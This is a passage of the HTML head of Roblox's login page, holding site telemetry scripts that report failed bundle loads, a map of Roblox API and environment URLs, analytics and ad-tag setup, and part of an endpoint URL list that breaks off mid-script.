<!DOCTYPE html>
<!--[if IE 8]><html class="ie8" ng-app="robloxApp"><![endif]-->
<!--[if gt IE 8]><!-->
<html>
 <!--<![endif]-->
 <head data-machine-id="WEB652">
  <!-- MachineID: WEB652 -->
  <title>
   Roblox
  </title>
  <meta content="IE=edge,requiresActiveX=true" http-equiv="X-UA-Compatible"/>
  <meta charset="utf-8">
   <meta content="width=device-width, initial-scale=1" name="viewport">
    <meta content="Roblox Corporation" name="author"/>
    <meta content="Roblox is a global platform that brings people together through play." name="description"/>
    <meta content="free games, online games, building games, virtual worlds, free mmo, gaming cloud, physics engine" name="keywords"/>
    <meta content="app-id=431946152" name="apple-itunes-app"/>
    <script type="application/ld+json">
     {
    "@context" : "http://schema.org",
    "@type" : "Organization",
    "name" : "Roblox",
    "url" : "https://www.roblox.com/",
    "logo": "https://images.rbxcdn.com/cece570e37aa8f95a450ab0484a18d91",
    "sameAs" : [
    "https://www.facebook.com/roblox/",
    "https://twitter.com/roblox",
    "https://www.linkedin.com/company/147977",
    "https://www.instagram.com/roblox/",
    "https://www.youtube.com/user/roblox",
    "https://plus.google.com/+roblox",
    "https://www.twitch.tv/roblox"
    ]
    }
    </script>
    <meta ng-csp="no-unsafe-eval">
     <meta data-language-code="en_us" data-language-name="English" name="locale-data"/>
     <meta data-app-type="unknown" data-device-type="computer" data-is-amazon-app="false" data-is-android-app="false" data-is-android-device="false" data-is-console="false" data-is-desktop="true" data-is-game-client-browser="false" data-is-in-app="false" data-is-ios-app="false" data-is-ios-device="false" data-is-phone="false" data-is-studio="false" data-is-tablet="false" data-is-universal-app="false" data-is-uwp-app="false" data-is-win32-app="false" data-is-xbox-app="false" name="device-meta"/>
     <meta data-is-testing-site="false" name="environment-meta"/>
     <meta data-enabled="true" id="roblox-display-names"/>
     <meta data-internal-page-name="Login" name="page-meta"/>
     <script type="text/javascript">
      var Roblox = Roblox || {};

    Roblox.BundleVerifierConstants = {
        isMetricsApiEnabled: true,
        eventStreamUrl: "//ecsv2.roblox.com/pe?t=diagnostic",
        deviceType: "Computer",
        cdnLoggingEnabled: JSON.parse("true")
    };
     </script>
     <script type="text/javascript">
      var Roblox = Roblox || {};

Roblox.BundleDetector = (function () {
    var isMetricsApiEnabled = Roblox.BundleVerifierConstants && Roblox.BundleVerifierConstants.isMetricsApiEnabled;

    var loadStates = {
        loadSuccess: "loadSuccess",
        loadFailure: "loadFailure",
        executionFailure: "executionFailure"
    };

    var bundleContentTypes = {
        javascript: "javascript",
        css: "css"
    };

    var ephemeralCounterNames = {
        cdnPrefix: "CDNBundleError_",
        unknown: "CDNBundleError_unknown",
        cssError: "CssBundleError",
        jsError: "JavascriptBundleError",
        jsFileError: "JsFileExecutionError",
        resourceError: "ResourcePerformance_Error",
        resourceLoaded: "ResourcePerformance_Loaded"
    };

    return {
        jsBundlesLoaded: {},
        bundlesReported: {},

        counterNames: ephemeralCounterNames,
        loadStates: loadStates,
        bundleContentTypes: bundleContentTypes,

        timing: undefined,

        setTiming: function (windowTiming) {
            this.timing = windowTiming;
        },

        getLoadTime: function () {
            if (this.timing && this.timing.domComplete) {
                return this.getCurrentTime() - this.timing.domComplete;
            }
        },

        getCurrentTime: function () {
            return new Date().getTime();
        },

        getCdnProviderName: function (bundleUrl, callBack) {
            if (Roblox.BundleVerifierConstants.cdnLoggingEnabled) {
                var xhr = new XMLHttpRequest();
                xhr.open('GET', bundleUrl, true);

                xhr.onreadystatechange = function () {
                    if (xhr.readyState === xhr.HEADERS_RECEIVED) {
                        try {
                            var headerValue = xhr.getResponseHeader("rbx-cdn-provider");
                            if (headerValue) {
                                callBack(headerValue);
                            } else {
                                callBack();
                            }
                        } catch (e) {
                            callBack();
                        }
                    }
                };

                xhr.onerror = function () {
                    callBack();
                };

                xhr.send();
            } else {
                callBack();
            }
        },

        getCdnProviderAndReportMetrics: function (bundleUrl, bundleName, loadState, bundleContentType) {
            this.getCdnProviderName(bundleUrl, function (cdnProviderName) {
                Roblox.BundleDetector.reportMetrics(bundleUrl, bundleName, loadState, bundleContentType, cdnProviderName);
            });
        },

        reportMetrics: function (bundleUrl, bundleName, loadState, bundleContentType, cdnProviderName) {
            if (!isMetricsApiEnabled
                || !bundleUrl
                || !loadState
                || !loadStates.hasOwnProperty(loadState)
                || !bundleContentType
                || !bundleContentTypes.hasOwnProperty(bundleContentType)) {
                return;
            }

            var xhr = new XMLHttpRequest();
            var metricsApiUrl = (Roblox.EnvironmentUrls && Roblox.EnvironmentUrls.metricsApi) || "https://metrics.roblox.com";

            xhr.open("POST", metricsApiUrl + "/v1/bundle-metrics/report", true);
            xhr.setRequestHeader("Content-Type", "application/json");
            xhr.withCredentials = true;
            xhr.send(JSON.stringify({
                bundleUrl: bundleUrl,
                bundleName: bundleName || "",
                bundleContentType: bundleContentType,
                loadState: loadState,
                cdnProviderName: cdnProviderName,
                loadTimeInMilliseconds: this.getLoadTime() || 0
            }));
        },

        logToEphemeralStatistics: function (sequenceName, value) {
            var deviceType = Roblox.BundleVerifierConstants.deviceType;
            sequenceName += "_" + deviceType;

            var xhr = new XMLHttpRequest();
            xhr.open('POST', '/game/report-stats?name=' + sequenceName + "&value=" + value, true);
            xhr.withCredentials = true;
            xhr.send();
        },

        logToEphemeralCounter: function (ephemeralCounterName) {
            var deviceType = Roblox.BundleVerifierConstants.deviceType;
            ephemeralCounterName += "_" + deviceType;
            //log to ephemeral counters - taken from eventTracker.js
            var xhr = new XMLHttpRequest();
            xhr.open('POST', '/game/report-event?name=' + ephemeralCounterName, true);
            xhr.withCredentials = true;
            xhr.send();
        },

        logToEventStream: function (failedBundle, ctx, cdnProvider, status) {
            var esUrl = Roblox.BundleVerifierConstants.eventStreamUrl,
                currentPageUrl = encodeURIComponent(window.location.href);

            var deviceType = Roblox.BundleVerifierConstants.deviceType;
            ctx += "_" + deviceType;
            //try and grab performance data.
            //Note that this is the performance of the xmlhttprequest rather than the original resource load.
            var duration = 0;
            if (window.performance) {
                var perfTiming = window.performance.getEntriesByName(failedBundle);
                if (perfTiming.length > 0) {
                    var data = perfTiming[0];
                    duration = data.duration || 0;
                }
            }
            //log to event stream (diagnostic)
            var params = "&evt=webBundleError&url=" + currentPageUrl +
                "&ctx=" + ctx + "&fileSourceUrl=" + encodeURIComponent(failedBundle) +
                "&cdnName=" + (cdnProvider || "unknown") +
                "&statusCode=" + (status || "unknown") +
                "&loadDuration=" + Math.floor(duration);
            var img = new Image();
            img.src = esUrl + params;
        },

        getCdnInfo: function (failedBundle, ctx, fileType) {
            if (Roblox.BundleVerifierConstants.cdnLoggingEnabled) {
                var xhr = new XMLHttpRequest();
                var counter = this.counterNames;
                xhr.open('GET', failedBundle, true);
                var cdnProvider;

                //succesful request
                xhr.onreadystatechange = function () {
                    if (xhr.readyState === xhr.HEADERS_RECEIVED) {
                        cdnProvider = xhr.getResponseHeader("rbx-cdn-provider");
                        if (cdnProvider && cdnProvider.length > 0) {
                            Roblox.BundleDetector.logToEphemeralCounter(counter.cdnPrefix + cdnProvider + "_" + fileType);
                        }
                        else {
                            Roblox.BundleDetector.logToEphemeralCounter(counter.unknown + "_" + fileType);
                        }
                    }
                    else if (xhr.readyState === xhr.DONE) {
                        // append status to cdn provider so we know its not related to network error. 
                        Roblox.BundleDetector.logToEventStream(failedBundle, ctx, cdnProvider, xhr.status);
                    }
                };

                //attach to possible things that can go wrong with the request.
                //additionally a network error will trigger this callback
                xhr.onerror = function () {
                    Roblox.BundleDetector.logToEphemeralCounter(counter.unknown + "_" + fileType);
                    Roblox.BundleDetector.logToEventStream(failedBundle, ctx, counter.unknown);
                };

                xhr.send();
            }
            else {
                this.logToEventStream(failedBundle, ctx);
            }
        },

        reportResourceError: function (resourceName) {
            var ephemeralCounterName = this.counterNames.resourceError + "_" + resourceName;
            this.logToEphemeralCounter(ephemeralCounterName);
        },

        reportResourceLoaded: function (resourceName) {
            var loadTimeInMs = this.getLoadTime();
            if (loadTimeInMs) {
                var sequenceName = this.counterNames.resourceLoaded + "_" + resourceName;
                this.logToEphemeralStatistics(sequenceName, loadTimeInMs);
            }
        },

        reportBundleError: function (bundleTag) {
            var ephemeralCounterName, failedBundle, ctx, contentType;
            if (bundleTag.rel && bundleTag.rel === "stylesheet") {
                ephemeralCounterName = this.counterNames.cssError;
                failedBundle = bundleTag.href;
                ctx = "css";
                contentType = bundleContentTypes.css;
            } else {
                ephemeralCounterName = this.counterNames.jsError;
                failedBundle = bundleTag.src;
                ctx = "js";
                contentType = bundleContentTypes.javascript;
            }

            //mark that we logged this bundle
            this.bundlesReported[failedBundle] = true;

            //e.g. javascriptBundleError_Computer
            this.logToEphemeralCounter(ephemeralCounterName);
            //this will also log to event stream
            this.getCdnInfo(failedBundle, ctx, ctx);

            var bundleName;
            if (bundleTag.dataset) {
                bundleName = bundleTag.dataset.bundlename;
            }
            else {
                bundleName = bundleTag.getAttribute('data-bundlename');
            }

            this.getCdnProviderAndReportMetrics(failedBundle, bundleName, loadStates.loadFailure, contentType);
        },

        bundleDetected: function (bundleName) {
            this.jsBundlesLoaded[bundleName] = true;
        },

        verifyBundles: function (document) {
            var ephemeralCounterName = this.counterNames.jsFileError,
                eventContext = ephemeralCounterName;
            //grab all roblox script tags in the page. 
            var scripts = (document && document.scripts) || window.document.scripts;
            var errorsList = [];
            var bundleName;
            var monitor;
            for (var i = 0; i < scripts.length; i++) {
                var item = scripts[i];

                if (item.dataset) {
                    bundleName = item.dataset.bundlename;
                    monitor = item.dataset.monitor;
                }
                else {
                    bundleName = item.getAttribute('data-bundlename');
                    monitor = item.getAttribute('data-monitor');
                }

                if (item.src && monitor && bundleName) {
                    if (!Roblox.BundleDetector.jsBundlesLoaded.hasOwnProperty(bundleName)) {
                        errorsList.push(item);
                    }
                }
            }
            if (errorsList.length > 0) {
                for (var j = 0; j < errorsList.length; j++) {
                    var script = errorsList[j];
                    if (!this.bundlesReported[script.src]) {
                        //log the counter only if the file is actually corrupted, not just due to failure to load
                        //e.g. JsFileExecutionError_Computer
                        this.logToEphemeralCounter(ephemeralCounterName);
                        this.getCdnInfo(script.src, eventContext, 'js');

                        if (script.dataset) {
                            bundleName = script.dataset.bundlename;
                        }
                        else {
                            bundleName = script.getAttribute('data-bundlename');
                        }

                        this.getCdnProviderAndReportMetrics(script.src, bundleName, loadStates.executionFailure, bundleContentTypes.javascript);
                    }
                }
            }
        }
    };
})();

window.addEventListener("load", function (evt) {
    Roblox.BundleDetector.verifyBundles();
});

Roblox.BundleDetector.setTiming(window.performance.timing);
            //# sourceURL=somename.js
     </script>
     <link href="https://images.rbxcdn.com/3b43a5c16ec359053fef735551716fc5.ico" rel="icon"/>
     <link data-bundle-source="Main" data-bundlename="StyleGuide" href="https://css.rbxcdn.com/5f133632560d0af8658795aa2c41f175e4b1977665f6d2a1cd04f0b06f573312.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Thumbnails" href="https://css.rbxcdn.com/9517d686dc47015c200496d77e2b18146ee37652d18e25ecf9e1ed230310ea13.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="VerificationUpsell" href="https://css.rbxcdn.com/d41f2dd08e2e54efa22d6e04120af18e4ca32b65227e62cf6f33933a7899241d.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Navigation" href="https://css.rbxcdn.com/7a42087c6631d868ddf19f8d8260a049b2bf374061753277f9763d4493adce6b.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="CookieBannerV3" href="https://css.rbxcdn.com/2c2a709240897ce382b7ff55be4347cd0994ab1e2d6ed3b56649e54b0e97e13a.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Footer" href="https://css.rbxcdn.com/6edb2191aa318f963253361b43d2657a04b3d16e9c28fe7b22d4a4d5686f1cb4.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="ConfigureWebApps" href="https://css.rbxcdn.com/08def520152a575438e73a81aa9a310c2415c327df7b624a24aa6e794d24dba3.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link href="https://www.roblox.com/NewLogin" rel="canonical"/>
     <link href="https://static.rbxcdn.com/css/leanbase___5e469c309d1eeddf42cc9d36a50f82e0_m.css/fetch" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link href="https://static.rbxcdn.com/css/page___b0dafd506d198313adc7eb9bccc23fbb_m.css/fetch" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Captcha" href="https://css.rbxcdn.com/0f161e158c689e76fd22cad828c428186a12e276dc4601aaffe5230c3ead905e.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="CrossDeviceLoginDisplayCode" href="https://css.rbxcdn.com/390eb5d1969a0b33f32893c11b2debd0aba6aa4c356328ffb8cc1976f8e82aea.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="AccountRecoveryModal" href="https://css.rbxcdn.com/4b5dce375cef78073d2192583d1ecd458f10c308fa99847d649d5ec801bebd61.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="RobuxIcon" href="https://css.rbxcdn.com/4fdd2f554b7d7bdd9491b4857be91acb07abfdf5514a73d93ea8f14ce78b6401.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="CaptchaCore" href="https://css.rbxcdn.com/b8f8f15a57a66e73469ae72eea7d8905346afa78b9f2397627cd099f7dcc779a.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Challenge" href="https://css.rbxcdn.com/88caf651319ae70b85659b27f7086efeb8e6150a7a4b46aa9b7cc674573f832e.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="ReactLogin" href="https://css.rbxcdn.com/e1ebff2bde945f57ed9ed570f73ee815c243b88cfcc62f3748f76d5ffa895e27.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <link data-bundle-source="Main" data-bundlename="Login" href="https://css.rbxcdn.com/e1ebff2bde945f57ed9ed570f73ee815c243b88cfcc62f3748f76d5ffa895e27.css" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" rel="stylesheet"/>
     <script type="text/javascript">
      var Roblox = Roblox || {};
    Roblox.EnvironmentUrls = Roblox.EnvironmentUrls || {};
    Roblox.EnvironmentUrls = {"abtestingApiSite":"https://abtesting.roblox.com","accountInformationApi":"https://accountinformation.roblox.com","accountSettingsApi":"https://accountsettings.roblox.com","adConfigurationApi":"https://adconfiguration.roblox.com","adsApi":"https://ads.roblox.com","apiGatewayCdnUrl":"https://apis.rbxcdn.com","apiGatewayUrl":"https://apis.roblox.com","apiProxyUrl":"https://api.roblox.com","assetDeliveryApi":"https://assetdelivery.roblox.com","authApi":"https://auth.roblox.com","avatarApi":"https://avatar.roblox.com","badgesApi":"https://badges.roblox.com","billingApi":"https://billing.roblox.com","captchaApi":"https://captcha.roblox.com","catalogApi":"https://catalog.roblox.com","chatApi":"https://chat.roblox.com","chatModerationApi":"https://chatmoderation.roblox.com","contactsApi":"https://contacts.roblox.com","contentStoreApi":"https://contentstore.roblox.com","developApi":"https://develop.roblox.com","domain":"roblox.com","economyApi":"https://economy.roblox.com","economycreatorstatsApi":"https://economycreatorstats.roblox.com","engagementPayoutsApi":"https://engagementpayouts.roblox.com","followingsApi":"https://followings.roblox.com","friendsApi":"https://friends.roblox.com","gameInternationalizationApi":"https://gameinternationalization.roblox.com","gamesApi":"https://games.roblox.com","groupsApi":"https://groups.roblox.com","groupsModerationApi":"https://groupsmoderation.roblox.com","helpSite":"http://help.roblox.com","inventoryApi":"https://inventory.roblox.com","itemConfigurationApi":"https://itemconfiguration.roblox.com","localeApi":"https://locale.roblox.com","localizationTablesApi":"https://localizationtables.roblox.com","metricsApi":"https://metrics.roblox.com","midasApi":"https://midas.roblox.com","notificationApi":"https://notifications.roblox.com","premiumFeaturesApi":"https://premiumfeatures.roblox.com","presenceApi":"https://presence.roblox.com","privateMessagesApi":"https://privatemessages.roblox.com","publishApi":"https://publish.roblox.com","restrictedHoursServiceApi":"https://apis.roblox.com/restricted-hours-service","screenTimeApi":"https://apis.rcs.roblox.com/screen-time-api","shareApi":"https://share.roblox.com","thumbnailsApi":"https://thumbnails.roblox.com","tradesApi":"https://trades.roblox.com","translationRolesApi":"https://translationroles.roblox.com","twoStepVerificationApi":"https://twostepverification.roblox.com","universalAppConfigurationApi":"https://apis.roblox.com/universal-app-configuration","userAgreementsServiceApi":"https://apis.roblox.com/user-agreements","userModerationApi":"https://usermoderation.roblox.com","usersApi":"https://users.roblox.com","voiceApi":"https://voice.roblox.com","websiteUrl":"https://www.roblox.com"};

    // please keep the list in alphabetical order
    var additionalUrls = {
        amazonStoreLink: "https://www.amazon.com/Roblox-Corporation/dp/B00NUF4YOA",
        amazonWebStoreLink: "https%3a%2f%2fwww.amazon.com%2froblox%3f%26_encoding%3dUTF8%26tag%3dr05d13-20%26linkCode%3dur2%26linkId%3d5562fc29c05b45562a86358c198356eb%26camp%3d1789%26creative%3d9325",
        appProtocolUrl: "robloxmobile://",
        appStoreLink: "https://itunes.apple.com/us/app/roblox-mobile/id431946152",
        googlePlayStoreLink: "https://play.google.com/store/apps/details?id=com.roblox.client&amp;hl=en",
        iosAppStoreLink: "https://itunes.apple.com/us/app/roblox-mobile/id431946152",
        windowsStoreLink: "https://www.microsoft.com/en-us/store/games/roblox/9nblgggzm6wm",
        xboxStoreLink: "https://www.microsoft.com/en-us/p/roblox/bq1tn1t79v9k"
    }

    for (var urlName in additionalUrls) {
        Roblox.EnvironmentUrls[urlName] = additionalUrls[urlName];
    }
     </script>
     <script type="text/javascript">
      var Roblox = Roblox || {};
    Roblox.GaEventSettings = {
        gaDFPPreRollEnabled: "false" === "true",
        gaLaunchAttemptAndLaunchSuccessEnabled: "false" === "true",
        gaPerformanceEventEnabled: "false" === "true"
    };
     </script>
     <script data-bundlename="headerinit" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/a67ddd9413db88f4124e2c4f25d8cb1f.js" type="text/javascript">
     </script>
     <script data-bundle-source="Main" data-bundlename="Polyfill" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/772034db167d3f4260047db4a7f2b8a58cf448709327013541e47c8962b6e556.js" type="text/javascript">
     </script>
     <script data-bundle-source="Main" data-bundlename="XsrfProtection" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/4db2f741b7a3ec36d11fec999ce33f708ae85641cabfd27e11e0935928f7d9c4.js" type="text/javascript">
     </script>
     <script data-bundle-source="Main" data-bundlename="HeaderScripts" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/97cb9ac7262155c329a259fce9f940f9bcfa852a6a1ccb44bd8a41c31e84e54b.js" type="text/javascript">
     </script>
     <meta data-dsn="https://6750adeb1b1348e4a10b13e726d5c10b@sentry.io/1539367" data-env-name="production" data-sample-rate="0" name="sentry-meta"/>
     <script data-bundle-source="Main" data-bundlename="Sentry" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/edc66704bd1974195d8c60f4a163441bec82f1bcb11c492e7df07c43f45a4d49.js" type="text/javascript">
     </script>
     <meta data-access-token="S3EXjCZQQr6OixnmKu+hoa3OSfpvPP5qgU0esiWgwreFUUMBnPhEaoS5yIIrf9bdYlSgW0XKCb1So9Rhtj1eMzt/MJWcyKZ4TwIckHVj" data-api-sites-request-allow-list="friends.roblox.com,chat.roblox.com,thumbnails.roblox.com,games.roblox.com" data-is-instrument-page-performance-enabled="true" data-sample-rate="5" data-service-name="Web" data-tracer-enabled="false" name="roblox-tracer-meta-data"/>
     <script data-bundle-source="Main" data-bundlename="RobloxTracer" data-monitor="true" onerror="Roblox.BundleDetector &amp;&amp; Roblox.BundleDetector.reportBundleError(this)" src="https://js.rbxcdn.com/adeccc658a8d5ddc63fb224cc0bcd3e29b73d70db3847c0379426bfa128d9381.js" type="text/javascript">
     </script>
     <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0" name="viewport"/>
     <script type="text/javascript">
      var Roblox = Roblox || {};
    Roblox.AdsHelper = Roblox.AdsHelper || {};
    Roblox.AdsLibrary = Roblox.AdsLibrary || {};

    Roblox.AdsHelper.toggleAdsSlot = function (slotId, GPTRandomSlotIdentifier) {
        var gutterAdsEnabled = false;
        if (gutterAdsEnabled) {
            googletag.display(GPTRandomSlotIdentifier);
            return;
        }
        
        if (typeof slotId !== 'undefined' && slotId && slotId.length > 0) {
            var slotElm = $("#"+slotId);
            if (slotElm.is(":visible")) {
                googletag.display(GPTRandomSlotIdentifier);
            }else {
                var adParam = Roblox.AdsLibrary.adsParameters[slotId];
                if (adParam) {
                    adParam.template = slotElm.html();
                    slotElm.empty();
                }
            }
        }
    }
     </script>
     <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
        <script src="//oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
     <script>
      //Set if it browser's do not track flag is enabled
    var Roblox = Roblox || {};
    (function() {
        var dnt = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
        if (typeof window.external !== "undefined" &&
            typeof window.external.msTrackingProtectionEnabled !== "undefined") {
            dnt = dnt || window.external.msTrackingProtectionEnabled();
        }
        Roblox.browserDoNotTrack = dnt == "1" || dnt == "yes" || dnt === true;
    })();
     </script>
     <script type="text/javascript">
      var _gaq = _gaq || [];

                window.GoogleAnalyticsDisableRoblox2 = true;
        _gaq.push(['b._setAccount', 'UA-486632-1']);
            _gaq.push(['b._setSampleRate', '10']);
        _gaq.push(['b._setCampSourceKey', 'rbx_source']);
        _gaq.push(['b._setCampMediumKey', 'rbx_medium']);
        _gaq.push(['b._setCampContentKey', 'rbx_campaign']);

            _gaq.push(['b._setDomainName', 'roblox.com']);

            _gaq.push(['b._setCustomVar', 1, 'Visitor', 'Anonymous', 2]);
                _gaq.push(['b._setPageGroup', 1, 'Login']);
                
                    var eventsArr = ['b._setCustomVar', 2, 'FirstTimeVisitor', 'true', 3];
                    _gaq.push(eventsArr);
                    $(function() {
                        if(GoogleAnalyticsEvents) {
                            GoogleAnalyticsEvents.Log(eventsArr);
                        }
                    });
                
            _gaq.push(['b._trackPageview']);

        _gaq.push(['c._setAccount', 'UA-26810151-2']);
            _gaq.push(['c._setSampleRate', '1']);
                    _gaq.push(['c._setDomainName', 'roblox.com']);
                    _gaq.push(['c._setPageGroup', 1, 'Login']);
     </script>
     <script async="" src="https://www.googletagmanager.com/gtag/js?id=AW-1065449093">
     </script>
     <script type="text/javascript">
      var accountCode = "AW-1065449093";
            var signupConversionEventKey = "wmuJCO3CZBCF7YX8Aw";
            var webPurchaseConversionEventKey = "XDQ_CJme6s0BEIXthfwD";
            window.dataLayer = window.dataLayer || [];

            function gtag() { dataLayer.push(arguments); }
            gtag.conversionEvents = {
                signupConversionEvent: accountCode + '/' + signupConversionEventKey,
                webPurchaseConversionEvent: accountCode + '/' + webPurchaseConversionEventKey
            }
            gtag ('set', 'allow_ad_personalization_signals', false) ;
            gtag('js', new Date());
            gtag('config', accountCode);
     </script>
     <script type="text/javascript">
      if (Roblox && Roblox.EventStream) {
                Roblox.EventStream.Init("//ecsv2.roblox.com/www/e.png",
                    "//ecsv2.roblox.com/www/e.png",
                    "//ecsv2.roblox.com/pe?t=studio",
                    "//ecsv2.roblox.com/pe?t=diagnostic");
            }
     </script>
     <script type="text/javascript">
      if (Roblox && Roblox.PageHeartbeatEvent) {
        Roblox.PageHeartbeatEvent.Init([2,8,20,60]);
    }
     </script>
     <script type="text/javascript">
      if (typeof(Roblox) === "undefined") { Roblox = {}; }
Roblox.Endpoints = Roblox.Endpoints || {};
Roblox.Endpoints.Urls = Roblox.Endpoints.Urls || {};
Roblox.Endpoints.Urls['/asset/'] = 'https://assetgame.roblox.com/asset/';
Roblox.Endpoints.Urls['/client-status/set'] = 'https://www.roblox.com/client-status/set';
Roblox.Endpoints.Urls['/client-status'] = 'https://www.roblox.com/client-status';
Roblox.Endpoints.Urls['/game/'] = 'https://assetgame.roblox.com/game/';
Roblox.Endpoints.Urls['/game/edit.ashx'] = 'https://assetgame.roblox.com/game/edit.ashx';
Roblox.Endpoints.Urls['/game/placelauncher.ashx'] = 'https://assetgame.roblox.com/game/placelauncher.ashx';
Roblox.Endpoints.Urls['/game/preloader'] = 'https://assetgame.roblox.com/game/preloader';
Roblox.Endpoints.Urls['/game/report-stats'] = 'https://assetgame.roblox.com/game/report-stats';
Roblox.Endpoints.Urls['/game/report-event'] = 'https://assetgame.roblox.com/game/report-event';
Roblox.Endpoints.Urls['/game/updateprerollcount'] = 'https://assetgame.roblox.com/game/updateprerollcount';
Roblox.Endpoints.Urls['/login/default.aspx'] = 'https://www.roblox.com/login/default.aspx';
Roblox.Endpoints.Urls['/my/avatar'] = 'https://www.roblox.com/my/avatar';
Roblox.Endpoints.Urls['/my/money.aspx'] = 'https://www.roblox.com/my/money.aspx';
Roblox.Endpoints.Urls['/navigation/userdata'] = 'https://www.roblox.com/navigation/userdata';
Roblox.Endpoints.Urls['/chat/chat'] = 'https://www.roblox.com/chat/chat';
Roblox.Endpoints.Urls['/chat/data'] = 'https://www.roblox.com/chat/data';
Roblox.Endpoints.Urls['/friends/list'] = 'https://www.roblox.com/friends/list';
Roblox.Endpoints.Urls['/navigation/getcount'] = 'https://www.roblox.com/navigation/getCount';
Roblox.Endpoints.Urls['/regex/email'] = 'https://www.roblox.com/regex/email';
Roblox.Endpoints.Urls['/catalog/browse.aspx'] = 'https://www.roblox.com/catalog/browse.aspx';
Roblox.Endpoints.Urls['/catalog/html'] = 'https://search.roblox.com/catalog/html';
Roblox.Endpoints.Urls['/catalog/json'] = 'https://search.roblox.com/catalog/json';
Roblox.Endpoints.Urls['/catalog/contents'] = 'https://search.roblox.com/catalog/contents';
Roblox.Endpoints.Urls['/catalog/lists.aspx'] = 'https://search.roblox.com/catalog/lists.aspx';
Roblox.Endpoints.Urls['/catalog/items'] = 'https://search.roblox.com/catalog/items';
Roblox.Endpoints.Urls['/asset-hash-thumbnail/image'] = 'https://assetgame.roblox.com/asset-hash-thumbnail/image';
Roblox.Endpoints.Urls['/asset-hash-thumbnail/json'] = 'https://assetgame.roblox.com/asset-hash-thumbnail/json';
Roblox.Endpoints.Urls['/asset-thumbnail-3d/json'] = 'https://assetgame.roblox.com/asset-thumbnail-3d/json';
Roblox.Endpoints.Urls['/asset-thumbnail/image'] = 'https://assetgame.roblox.com/asset-thumbnail/image';
Roblox.Endpoints.Urls['/asset-thumbnail/json'] = 'https://assetgame.roblox.com/asset-thumbnail/json';
Roblox.Endpoints.Urls['/asset-thumbnail/url'] = 'https://assetgame.roblox.com/asset-thumbnail/url';
Roblox.Endpoints.Urls['/asset/request-thumbnail-fix'] = 'https://assetgame.roblox.com/asset/request-thumbnail-fix';
Roblox.Endpoints.Urls['/avatar-thumbnail-3d/json'] = 'https://www.roblox.com/avatar-thumbnail-3d/json';
Roblox.Endpoints.Urls['/avatar-thumbnail/image'] = 'https://www.roblox.com/avatar-thumbnail/image';
Roblox.Endpoints.Urls['/avatar-thumbnail/json'] = 'https://www.roblox.com/avatar-thumbnail/json';
Roblox.Endpoints.Urls['/avatar-thumbnails'] = 'https://www.roblox.com/avatar-thumbnails';
Roblox.Endpoints.Urls['/avatar/request-thumbnail-fix'] = 'https://www.roblox.com/avatar/request-thumbnail-fix';
Roblox.Endpoints.Urls['/bust-thumbnail/json'] = 'https://www.roblox.com/bust-thumbnail/json';
Roblox.Endpoints.Urls['/headshot-thumbnail/json'] = 'https://www.roblox.com/headshot-thumbnail/json';
Roblox.Endpoints.Urls['/item-thumbnails'] = 'https://www.roblox.com/item-thumbnails';
Roblox.Endpoints.Urls['/outfit-thumbnail/json'] = 'https://www.roblox.com/outfit-thumbnail/json';
Roblox.Endpoints.Urls['/place-thumbnails'] = 'https://www.roblox.com/place-thumbnails';
Roblox.Endpoints.Urls['/thumbnail/asset/'] = 'https://www.roblox.com/thumbnail/asset/';
